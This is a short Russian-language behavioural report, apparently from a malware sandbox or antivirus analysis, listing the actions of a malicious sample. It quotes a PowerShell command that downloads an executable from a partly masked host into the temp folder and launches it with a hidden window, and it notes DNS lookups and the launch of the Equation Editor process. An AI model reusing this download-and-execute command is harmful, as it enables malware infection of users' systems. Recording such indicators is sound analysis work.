Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$UOC=$env:temp+'\Name.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://am##ai.org/admin/_output16570B0.exe' -Destination $UOC;(New-Object -com Shell.Applica...
- DNS ASK am##ai.org
- DNS ASK oc##.#tartssl.com
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$UOC=$env:temp+'\Name.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://am##ai.org/admin/_output16570B0.exe' -Destination $UOC;(New-Object -com Shell.Applica...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding